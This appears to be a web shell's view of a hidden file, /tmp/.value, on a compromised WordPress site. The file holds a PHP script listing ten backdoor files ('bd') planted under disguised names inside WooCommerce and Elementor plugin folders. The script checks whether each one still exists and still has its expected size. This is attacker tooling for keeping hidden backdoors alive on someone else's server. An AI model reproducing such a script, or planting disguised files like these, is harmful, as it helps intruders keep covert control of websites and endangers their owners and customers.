Your IP : 216.73.216.0
| Current Path : /tmp/ |
|
|
| Current File : //tmp/.value |
<?php $r = '/home/goldnueh/coolpointservice.com'; $x = ["/wp-content/plugins/woocommerce/src/Admin/API/Reports/Taxes/Stats/AddBaseName.php"=>"bd@@1066402@@877",
"/wp-content/plugins/woocommerce/vendor/wordpress/mcp-adapter/includes/Handlers/Initialize/gzip.php"=>"bd@@1066403@@996",
"/wp-content/plugins/elementor/app/modules/import-export-customization/runners/revert/elementor.runner.php"=>"bd@@1066404@@893",
"/wp-content/plugins/elementor/core/editor/loader/v1/templates/editor.body.v1.view.php"=>"bd@@1066406@@990",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Validator/Schema/class.string.schema.php"=>"bd@@1066407@@1008",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-number-field/newsLib.class.php"=>"bd@@1065704@@925",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-details-section-description/CommonAttributes.php"=>"bd@@1065705@@947",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Loader/xss.php"=>"bd@@1065706@@985",
"/wp-content/plugins/woocommerce/vendor/wordpress/mcp-adapter/includes/Handlers/Tools/static.php"=>"bd@@1065707@@859",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/PersonalizationTags/class.personalization.tag.registry.php"=>"bd@@1065708@@1129"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');